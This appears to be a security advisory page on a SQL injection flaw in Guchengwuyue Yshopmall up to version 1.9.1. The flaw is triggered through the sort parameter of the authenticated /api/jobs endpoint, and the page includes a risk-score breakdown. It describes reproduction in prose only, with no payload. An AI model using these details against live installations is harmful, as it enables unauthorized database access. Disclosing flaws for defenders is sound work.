Primary

Context

Guchengwuyue Yshopmall SQL Injection Vulnerability in Job Controller

Vulnerability

A SQL injection vulnerability has been identified in Guchengwuyue Yshopmall versions through 1.9.1. The issue arises in the JobController's getJobs function, where the sort parameter is manipulated, leading to unauthorized SQL command execution. This vulnerability can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows for SQL injection, where an attacker can interfere with the application's database queries. This could lead to unauthorized data access, data manipulation, or in some cases, executing administrative operations on the database.

Reproduction

To reproduce this vulnerability, send a GET request to the /api/jobs endpoint with a crafted sort parameter. The request must include a valid Authorization header with a Bearer token. This vulnerability can be tested using tools like Postman or through a simple script that automates the request.

Added: Jan 9, 2026, 5:28 PM

Updated: Jan 9, 2026, 7:18 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

6.6

remediation

0.0

relevance

1.9

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

6.6

remediation

0.0

relevance

1.9

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Guchengwuyue Yshopmall SQL Injection Vulnerability in Job Controller

Vulnerability

Impact

Reproduction

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating